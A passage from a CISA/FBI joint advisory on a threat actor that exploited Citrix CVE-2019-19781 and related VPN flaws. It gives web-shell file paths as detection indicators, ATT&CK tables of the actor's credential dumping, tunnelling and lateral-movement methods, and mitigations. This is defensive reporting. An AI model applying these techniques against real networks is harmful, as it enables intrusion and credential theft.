MAR-10297887-1.v1</a> details some of the tools this threat actor used against some victims.</li> </ul> <p>The following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.</p> <ul> <li>Tiny web shell</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /netscaler/ns_gui/vpn/images/vpn_ns_gui.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/tiny.php</code></p> <ul> <li>ChunkyTuna web shell</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/debug.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/include.php<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/vpn/themes/imgs/whatfile</code></p> <ul> <li>Chisel</li> </ul> <p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /var/nstmp/chisel</code></p> <h3>MITRE ATT&amp;CK Framework</h3> <h4>Initial Access</h4> <p>As indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.</p> <p class="italic text-align-center"><em>Table 2: Initial access techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1190/">T1190</a></p> </td> <td scope="col" style="width: 254px;">Exploit Public-Facing Application</td> <td scope="col" style="width: 424px;">The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902.</td> </tr> </tbody> </table> <h4>Execution</h4> <p>After gaining initial access, the threat actor began executing scripts, as shown in table 3.</p> <p class="italic text-align-center"><em>Table 3: Execution techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1059/001/">T1059.001</a></p> </td> <td scope="col" style="width: 254px;">Command and Scripting Interpreter: PowerShell</td> <td scope="col" style="width: 424px;">A PowerShell script (<code>keethief</code> and <code>kee.ps1</code>) was used to access KeePass data.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a></p> </td> <td scope="col" style="width: 254px;">Command and Scripting Interpreter: Windows Command Shell</td> <td scope="col" style="width: 424px;"><code>cmd.exe</code> was launched via sticky keys that was likely used as a password changing mechanism.</td> </tr> </tbody> </table> <h4>Persistence</h4> <p>CISA observed the threat actor using the techniques identified in table 4 to establish persistence.</p> <p class="italic text-align-center"><em>Table 4: Persistence techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1053/003/">T1053.003</a></p> </td> <td scope="col" style="width: 254px;">Scheduled Task/Job: Cron</td> <td scope="col" style="width: 424px;">The threat actor loaded a series of scripts to <code>cron</code> and ran them for various purposes (mainly to access NetScaler web forms).</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1053/005/">T1053.005</a></p> </td> <td scope="col" style="width: 254px;">Scheduled Task/Job: Scheduled Task</td> <td scope="col" style="width: 424px;">The threat actor installed and used FRPC (<code>frpc.exe</code>) on both NetScaler and internal devices. The task was named <code>lpupdate</code> and the binary was named <code>svchost</code>, which was the reverse proxy. The threat actor executed this command daily.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a></p> </td> <td scope="col" style="width: 254px;">Server Software Component: Web Shell</td> <td scope="col" style="width: 424px;">The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1546/008/">T1546.008</a></p> </td> <td scope="col" style="width: 254px;">Event Triggered Execution: Accessibility Features</td> <td scope="col" style="width: 424px;">The threat actor used sticky keys (<code>sethc.exe</code>) to launch <code>cmd.exe</code>.</td> </tr> </tbody> </table> <h4>Privilege Escalation</h4> <p>CISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.</p> <h4>Defense Evasion</h4> <p>CISA observed the threat actor using the techniques identified in table 5 to evade detection.</p> <p class="italic text-align-center"><em>Table 5: Defensive evasion techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1027/002/">T1027.002</a></p> </td> <td scope="col" style="width: 254px;">Obfuscated Files or Information: Software Packing</td> <td scope="col" style="width: 424px;">The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1036/004/">T1027.004</a></p> </td> <td scope="col" style="width: 254px;">Obfuscated Files or Information: Compile After Delivery</td> <td scope="col" style="width: 424px;">The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1245/">T1036.004</a></p> </td> <td scope="col" style="width: 254px;">Masquerading: Masquerade Task or Service</td> <td scope="col" style="width: 424px;">The threat actor used FRPC (<code>frpc.exe</code>) daily as reverse proxy, tunneling RDP over TLS. The FRPC (<code>frpc.exe</code>) task name was <code>lpupdate</code> and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1036/005/">T1036.005</a></p> </td> <td scope="col" style="width: 254px;">Masquerading: Match Legitimate Name or Location</td> <td scope="col" style="width: 424px;">The FRPC (<code>frpc.exe</code>) binary name was <code>svchost</code>, and the configuration file was <code>dllhost.dll</code>, attempting to masquerade as a legitimate Dynamic Link Library.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1070/004/">T1070.004</a></p> </td> <td scope="col" style="width: 254px;">Indicator Removal on Host: File Deletion</td> <td scope="col" style="width: 424px;">To minimize their footprint, the threat actor ran <code>./httpd-nscache_clean</code> every 30 minutes, which cleaned up files on the NetScaler device.</td> </tr> </tbody> </table> <h4>Credential Access</h4> <p>CISA observed the threat actor using the techniques identified in table 6 to further their credential access.</p> <p class="italic text-align-center"><em>Table 6: Credential access techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1003/001/">T1003.001</a></p> </td> <td scope="col" style="width: 254px;">OS Credential Dumping: LSASS Memory</td> <td scope="col" style="width: 424px;">The threat actor used <code>procdump</code> to dump process memory from the Local Security Authority Subsystem Service (LSASS).</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1003/003/">T1003.003</a></p> </td> <td scope="col" style="width: 254px;">OS Credential Dumping: Windows NT Directory Services (NTDS)</td> <td scope="col" style="width: 424px;">The threat actor used Volume Shadow Copy to access credential information from the NTDS file.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1552/001/">T1552.001</a></p> </td> <td scope="col" style="width: 254px;">Unsecured Credentials: Credentials in Files</td> <td scope="col" style="width: 424px;">The threat actor accessed files containing valid credentials.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1555/">T1555</a></p> </td> <td scope="col" style="width: 254px;">Credentials from Password Stores</td> <td scope="col" style="width: 424px;">The threat actor accessed a <code>KeePass</code> database multiple times and used <code>kee.ps1</code> PowerShell script.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1558/">T1558</a></p> </td> <td scope="col" style="width: 254px;">Steal or Forge Kerberos Tickets</td> <td scope="col" style="width: 424px;">The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account.</td> </tr> </tbody> </table> <h4>Discovery</h4> <p>CISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.</p> <p class="italic text-align-center"><em>Table 7: Discovery techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1018/">T1018</a></p> </td> <td scope="col" style="width: 254px;">Remote System Discovery</td> <td scope="col" style="width: 424px;">The threat actor used Angry IP Scanner to detect remote systems.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1083/">T1083</a></p> </td> <td scope="col" style="width: 254px;">File and Directory Discovery</td> <td scope="col" style="width: 424px;">The threat actor used WizTree to obtain network files and directory listings.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1087/">T1087</a></p> </td> <td scope="col" style="width: 254px;">Account Discovery</td> <td scope="col" style="width: 424px;">The threat actor accessed <code>ntuser.dat</code> and <code>UserClass.dat</code> and used Softerra LDAP Browser to browse documentation for service accounts.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1217/">T1217</a></p> </td> <td scope="col" style="width: 254px;">Browser Bookmark Discovery</td> <td scope="col" style="width: 424px;">The threat actor used Google Chrome bookmarks to find internal resources and assets.</td> </tr> </tbody> </table> <h4>Lateral Movement</h4> <p>CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.</p> <p class="italic text-align-center"><em>Table 8: Lateral movement techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/">T1021</a></p> </td> <td scope="col" style="width: 254px;">Remote Services</td> <td scope="col" style="width: 424px;">The threat actor used RDP with valid account credentials for lateral movement in the environment.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/001/">T1021.001</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: Remote Desktop Protocol</td> <td scope="col" style="width: 424px;">The threat actor used RDP to log in and then conduct lateral movement.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: SMB/Windows Admin Shares</td> <td scope="col" style="width: 424px;">The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/004/">T1021.004</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: SSH</td> <td scope="col" style="width: 424px;">The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive.&nbsp;</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1021/005/">T1021.005</a></p> </td> <td scope="col" style="width: 254px;">Remote Services: Virtual Network Computing (VNC)</td> <td scope="col" style="width: 424px;">The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1563/002/">T1563.002</a></p> </td> <td scope="col" style="width: 254px;">Remote Service Session Hijacking: RDP Hijacking</td> <td scope="col" style="width: 424px;">The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment.</td> </tr> </tbody> </table> <h4>Collection</h4> <p>CISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.</p> <p class="italic text-align-center"><em>Table 9: Collection techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1005/">T1005</a></p> </td> <td scope="col" style="width: 254px;">Data from Local System</td> <td scope="col" style="width: 424px;">The threat actor searched local system sources to accessed sensitive documents.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1039/">T1039</a></p> </td> <td scope="col" style="width: 254px;">Data from Network Shared Drive</td> <td scope="col" style="width: 424px;">The threat actor searched network shares to access sensitive documents.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1213/">T1213</a></p> </td> <td scope="col" style="width: 254px;">Data from Information Repositories</td> <td scope="col" style="width: 424px;">The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1530/">T1530</a></p> </td> <td scope="col" style="width: 254px;">Data from Cloud Storage Object</td> <td scope="col" style="width: 424px;">The threat actor obtained files from the victim cloud storage instances.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1560/001/">T1560.001</a></p> </td> <td scope="col" style="width: 254px;">Archive Collected Data: Archive via Utility</td> <td scope="col" style="width: 424px;">The threat actor used 7-Zip to archive data.</td> </tr> </tbody> </table> <h4>Command and Control</h4> <p>CISA observed the threat actor using the techniques identified in table 10 for command and control (C2).</p> <p class="italic text-align-center"><em>Table 10: Command and control techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" height="180" style="margin-left: auto; margin-right: auto;" width="955"> <thead> <tr> <th scope="col" style="width: 125px;"> <p>ID</p> </th> <th scope="col" style="width: 254px;"> <p>Technique/Sub-Technique</p> </th> <th scope="col" style="width: 424px;"> <p>Context</p> </th> </tr> </thead> <tbody> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1071/001/">T1071.001</a></p> </td> <td scope="col" style="width: 254px;">Application Layer Protocol: Web Protocols</td> <td scope="col" style="width: 424px;">The threat actor used various web mechanisms and protocols, including the web shells listed in table 1.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1105/">T1105</a></p> </td> <td scope="col" style="width: 254px;">Ingress Tool Transfer</td> <td scope="col" style="width: 424px;">The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes.</td> </tr> <tr> <td scope="col" style="width: 125px;"> <p><a href="https://attack.mitre.org/techniques/T1572/">T1572</a></p> </td> <td scope="col" style="width: 254px;">Protocol Tunneling</td> <td scope="col" style="width: 424px;">The threat actor used <code>FRPC.exe</code> to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling.</td> </tr> </tbody> </table> <h4>Exfiltration</h4> <p>CISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.</p> <h3>Mitigations</h3><h4>Recommendations</h4> <p>CISA and FBI recommend implementing the following recommendations.</p> <ul> <li>If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">AA20-031A</a>.</li> <li>This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.</li> <li>If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. <ul> <li>If compromised, rebuild/reimage compromised NetScaler devices.</li> </ul> </li> <li>Routinely audit configuration and patch management programs.</li> <li>Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).</li> <li>Implement multi-factor authentication, especially for privileged accounts.</li> <li>Use separate administrative accounts on separate administration workstations.</li> <li>Implement the principle of least privilege on data access.</li> <li>Secure RDP and other remote access solutions using multifactor authentication and “jump boxes” for access.</li> <li>Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.</li> <li>Keep software up to date.</li> </ul> <h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="https://us-cert.cisa.govmailto: CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="https://us-cert.cisa.govmailto: Central@cisa.dhs.gov">central@cisa.dhs.gov</a>.</p> <h3>Resources</h3> <p><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-073a">CISA Alert AA20-073A: Enterprise VPN Security</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-107a">CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching</a><br /> <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-206a">CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902</a><br /> <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">CISA Security Tip: Securing Network Infrastructure Devices</a></p> <h3>Revisions</h3> <ul> <li>September 15, 2020: Initial Version</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>